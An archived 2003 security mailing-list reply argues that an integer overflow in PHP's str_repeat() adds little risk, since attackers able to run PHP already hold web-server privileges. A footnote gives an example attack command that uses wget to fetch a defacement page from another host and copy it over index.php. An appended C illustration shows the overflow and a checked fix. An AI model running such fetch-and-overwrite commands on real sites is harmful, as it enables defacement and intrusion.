Re: @(#)Mordred Labs advisory - Integer overflow in PHP str_repeat() function

From: Goran Krajnovic (goran.krajnovicat_private)
Date: Wed Apr 02 2003 - 22:39:03 PST


    On 2003.04.01 14:29 Sir Mordred wrote:
    > The implementation of this function suffers from a simple integer overflow
    > caused by a very long second argument and could allow a local/remote attacker
    > in the worst case to gain control over the web server.
    
    This is a bit pointless, IMHO. 99% of PHP installations run the PHP code with
    the user-id of the web server process (usually a low privilege user like
    'nobody' or 'apache'). Exploiting one (of many) bugs in PHP to 'gain control
    over the web server' is like getting a remote shell on a machine and then
    running a buffer overflow exploit in order just to be able to run commands
    instead of typing them into the shell directly.
    
    If an attacker has the opportunity to execute PHP code of his choice on a
    target server [1], he does not need to exploit a buffer overflow in PHP just to
    get the privileges of the web server user - he already runs code with the
    privileges of that user. And having the ability to run PHP code gives him just
    about the same level of power as getting a non-root shell on the box.
    
    Searching on http://bugs.php.net will give you a lot more ways to crash PHP,
    and probably a number of these can be used to get a buffer overflow, but I
    don't think that reporting each of them here will solve anything. Report them
    to http://bugs.php.net.
    
    [1] Usually by exploiting some of the poor programming practices in some PHP
    applications, misconfigurations, or bugs. See
    http://www.securityfocus.com/bid/3889 for example. In a typical attack, this is
    used to execute code, and the code is usually system('wget
    http://another.exploited.host/defaced-index.php'); system('cp defaced-index.php
    index.php') or similar.
    
    -- 
    Goran Krajnović,  dipl. ing.
    [ Goran.Krajnovicat_private ]
    Hrvatski Telekom - HThinet
    
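The bug class the advisory describes, a length computed as string length times repeat count that wraps when the count is huge, in C as an added illustration (not PHP's own str_repeat() source and not part of the original post); the function names and the 32-bit wrapping variant are hypothetical, chosen only to make the wrap and the fix observable.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical str_repeat-style length math, not PHP's code.  The result
 * length is len * count.  Computed in a fixed-width integer without a
 * check, a huge count wraps it to a small value, the buffer is then
 * under-allocated, and the copy loop writes past its end. */

/* Unchecked 32-bit variant: returns the wrapped (wrong) length.  It never
 * allocates; it only shows what an unchecked multiply produces. */
uint32_t repeat_len_unchecked32(uint32_t len, uint32_t count) {
    return len * count;               /* silently wraps modulo 2^32 */
}

/* Checked variant: 0 on success with the exact length in *out,
 * -1 if len * count would not fit in size_t. */
int repeat_len_checked(size_t len, size_t count, size_t *out) {
    if (len == 0 || count == 0) { *out = 0; return 0; }
    if (count > SIZE_MAX / len) return -1;   /* product would wrap */
    *out = len * count;
    return 0;
}

/* Hardened repeat: NULL on overflow or allocation failure, otherwise a
 * freshly malloc'ed, NUL-terminated copy of s repeated count times. */
char *str_repeat_safe(const char *s, size_t count) {
    size_t len = strlen(s), total;
    if (repeat_len_checked(len, count, &total) != 0) return NULL;
    if (total == SIZE_MAX) return NULL;      /* no room for the terminator */
    char *buf = malloc(total + 1);
    if (buf == NULL) return NULL;
    for (size_t i = 0; i < count; i++) memcpy(buf + i * len, s, len);
    buf[total] = '\0';
    return buf;
}
```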



    This archive was generated by hypermail 2b30 : Thu Apr 03 2003 - 14:23:49 PST